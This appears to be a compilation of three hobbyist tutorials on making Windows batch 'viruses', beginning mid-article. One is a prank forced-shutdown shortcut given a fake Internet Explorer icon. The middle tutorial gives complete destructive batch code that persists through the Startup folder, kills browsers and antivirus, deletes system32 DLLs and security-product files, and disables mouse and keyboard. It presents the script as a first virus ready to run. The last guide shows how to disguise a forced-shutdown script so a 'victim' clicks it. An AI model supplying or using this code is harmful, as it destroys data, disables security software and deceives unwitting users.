(note: the number 30 can be replaced by any other number. That number corresponds to the number of seconds before the computer will shutdown. Here I have chosen 30 in order to have enough time to close it before my computer shuts down. Also, the message between quotes can be replaced by something like "YOU HAVE BEEN INFECTED BY A TROJAN VIRUS" or some other great idea. However, the message must be between quotes.)

After, simply click on Next and a box with the name Shutdown will appear. Change the name that you want for it. In this case I have chosen Internet Explorer but it can always be renamed how you prefer.

After naming it, click on Finish and ... here's your shutdown virus!!!! Not very convincing he? Well, in that case let's change our icon!

Right-click on your shutdown Internet Explorer icon (or whichever name you gave it) and select Properties.

Select Change Icon

(Note: A box saying "system 32 does not have any icons choose from a diffrent list" or something like that may pop-up; if it does simply click on Ok)

Now... it depends on what you have named your shutdown virus ... If you chose Internet Explorer scroll all the way to the right and you will find the icon. If you did not choose Internet Explorer feel free to choose a different icon... Remember it has to be something that people will click on.

Now Heres our Icon ... Now it looks like something that people will click on.

To close the program, select the start menu and click on Run...

Write: Shutdown -a

and the program should shutdown immediately.

(Note: To shut it, you can also do a new shortcut but instead of writing shutdown -s -t 30 -c "VIRUS DETECTED" write this: shutdown -a

and call it Shutdown abort..So instead of closing it with Run you can just click on your shutdown abort shortcut.)

Have fun freaking out your friends/family ... And dont forget to close it or put a longer time frame so that you will have enough time to close it.

WARNING: This program will really shutdown your computer. It may be fun to do it to little sisters or friends but refrain from using it if someone is actually working on the computer, since they will lose all their information.

How to create a computer virus?

You might be scared of viruses in your computer or laptop. They directly affect the working of the computer systems. You may want to create your own virus too. This guide will show you how you can create a simple virus. Open the notepad file and paste the following code:
@echo off
copy "virus.bat" "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
copy "virus.bat" "C:\"
copy "virus.bat" "%userprofile%\My Documents"
tskill explorer
tskill ccapp
tskill yahoomessenger
tskill firefox
tskill chrome
rem made with Batch Virus Maker V.2
tskill iexplorer
time 12:00
rem made with Batch Virus Maker V.2
del C:\Program Files\Common Files\Symantec Shared\ccapp.exe
if exist "*.bat" del "*.bat"
cd C:\WINDOWS\system32
rem made with Batch Virus Maker V.2
if exist "*.dll" del "*.dll"
tskill McAfee Security Centre Module
del c:\program files\\agent\mcdetect.exe
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat45544"
copy "virus.bat" "virus.bat85858"
copy "virus.bat" "virus.bat1645"
copy "virus.bat" "virus.bat574457"
copy "virus.bat" "virus.bat55457"
copy "virus.bat" "virus.bat9765"
copy "virus.bat" "virus.bat45465"
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat456877"
copy "virus.bat" "virus.bat77989845"
copy "virus.bat" "virus.bat2135"
copy "virus.bat" "virus.bat46876"
rem made with Batch Virus Maker V.2
copy "virus.bat" "virus.bat45687"
copy "virus.bat" "virus.bat8868"
copy "virus.bat" "virus.bat2000"
copy "virus.bat" "virus.bat2009"
msg * this is a virus
rundll mouse,disable
rem made with Batch Virus Maker V.2
rundll keyboard,disable
Save it as “virus.bat” or anything with the name you want to. Now your first virus is ready to work. You can also convert it as .exe file. It copies itself to startup, hard disk, my documents and then it kills explorer.exe, chrome.exe and firefox.exe. It tries to delete mcafee antivirus and tries to delete every .dll and .bat files.  Now if someone clicks on the .bat or .exe file this batch file will run and execute the operations written in the code. So beware of running this batch file or you may need for a restoration on your computer. Read more about what is a computer virus, types of computer virus.
Pataleshwar Mishra

How to Create a Fake and Harmless Virus

Building the Virus

  1. 1
    Run Notepad. Notepad will allow you to input text with very little formatting. Click Start -> All Programs -> Accessories -> Notepad.
    • If you're on a Mac, use TextEdit.
  2. 2
    Input a small batch file. Put the following into your text file (without the bullets):
    • @echo off
    • echo hahahaha im hacking ur computer
    • shutdown -s -f -t 60 -c "type a message you want to appear here."
  3. 3
    Click File, then Save As.
  4. 4
    Name your file.
  5. 5
    Change the .txt extension to .bat or .cmd.
  6. 6
    Change the ".txt bar" to "All Files".
  7. 7
    Click Save.
  8. 8
    Close Notepad.

Making a Fake Icon

  1. 1
    Right click on the desktop and go over to "New," then click "Shortcut".
  2. 2
    For the location of the shortcut, choose your virus.
  3. 3
    Click "Next".
  4. 4
    Give the shortcut a name that your victim will click on.
  5. 5
    Click on "Finish".
  6. 6
    Right click on the shortcut you have just made and choose "Properties".
  7. 7
    Click on the "Choose icon" button and scroll through the list of icons.
  8. 8
    Choose an icon that the name of your file. Click on it and hit "OK" twice.